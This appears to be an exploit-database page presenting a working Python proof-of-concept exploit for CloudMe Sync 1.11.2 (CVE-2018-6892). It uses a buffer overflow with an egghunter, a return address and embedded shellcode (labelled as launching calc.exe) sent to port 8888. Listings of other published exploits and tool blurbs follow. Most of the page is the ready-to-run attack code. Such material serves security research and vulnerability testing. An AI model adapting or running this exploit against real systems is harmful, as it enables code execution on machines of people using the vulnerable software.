Search for hundreds of thousands of exploits

"CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt"

Author

Exploit author

T3jv1l

Platform

Exploit platform

windows

Release date

Exploit published date

2019-01-22

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
#######################################################
# Exploit Title: CloudMe Sync v1.11.2 Buffer Overflow + Egghunt
# Date: 23.04.2018
# Exploit Author:T3jv1l
# Vendor Homepage:https://www.cloudme.com/en
# Software: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Category:Local
# Contact:https://twitter.com/T3jv1l
# Version: CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt
# Tested on: Windows 7 SP1 x86
# CVE-2018-6892
# Real exploit https://www.exploit-db.com/exploits/44027 in version 1.11.0
# Hello subinacls and NytroRST !

#############################################################

import socket

egg = (
"\x66\x81\xca\xff\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e\x3c\x05\x5a\x74" #boom
"\xef\xb8\x62\x6f\x6f\x6d\x8b\xfa" 
"\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

target="127.0.0.1"
junk="A"*1015			
jmp="\xd9\x37\x99\x69"  #0x699937d9 push ret
jump_back="\xeb\xc4"    #jump -60 bytes


#Shellcode calc.exe
buf = ""
buf +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
buf +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
buf +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
buf +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
buf +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
buf +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
buf +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
buf +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
buf +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
buf +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
buf +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
buf +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
buf +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
buf +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
buf +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
buf +="\xc4\xd9"

payload1=junk+egg+"B"*5 + jmp + jump_back
payload2="boomboom" + buf

try:
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((target,8888))
	s.send(payload1+payload2)
except:
	print "Don't Crash Me !"
Release Date Title Type Platform Author
2020-09-21 "ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path" local windows "Burhanettin Ozgenc"
2020-09-21 "B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution" webapps multiple LiquidWorm
2020-09-21 "Mida eFramework 2.9.0 - Back Door Access" webapps hardware elbae
2020-09-21 "BlackCat CMS 1.3.6 - Cross-Site Request Forgery" webapps php Noth
2020-09-21 "Seat Reservation System 1.0 - 'id' SQL Injection" webapps php Augkim
2020-09-21 "Online Shop Project 1.0 - 'p' SQL Injection" webapps php Augkim
2020-09-18 "Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)" webapps php "Nikolas Geiselman"
2020-09-18 "SpamTitan 7.07 - Remote Code Execution (Authenticated)" webapps multiple "Felipe Molina"
2020-09-17 "Microsoft SQL Server Reporting Services 2016 - Remote Code Execution" remote windows "West Shepherd"
2020-09-16 "Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software" local windows hyp3rlinx
Release Date Title Type Platform Author
2020-04-17 "Code Blocks 16.01 - Buffer Overflow (SEH) UNICODE" local windows T3jv1l
2019-01-22 "CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt" remote windows T3jv1l
2018-12-27 "NetShareWatcher 1.5.8 - Denial of Service (PoC)" dos windows_x86 T3jv1l
2018-12-27 "Product Key Explorer 4.0.9 - Denial of Service (PoC)" dos windows_x86 T3jv1l
2018-12-27 "ShareAlarmPro 2.1.4 - Denial of Service (PoC)" dos windows_x86 T3jv1l
2018-09-11 "HTML5 Video Player 1.2.5 - Denial of Service (PoC)" dos windows_x86 T3jv1l
2018-09-10 "Any Sound Recorder 2.93 - Denial of Service (PoC)" local windows_x86 T3jv1l
2018-09-07 "DVD Photo Slideshow Professional 8.07 - Buffer Overflow (SEH)" local windows T3jv1l
2018-04-26 "Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow (SEH)" local windows T3jv1l
2018-04-24 "Allok Video to DVD Burner 2.6.1217 - Buffer Overflow (SEH)" local windows T3jv1l
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/46218/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.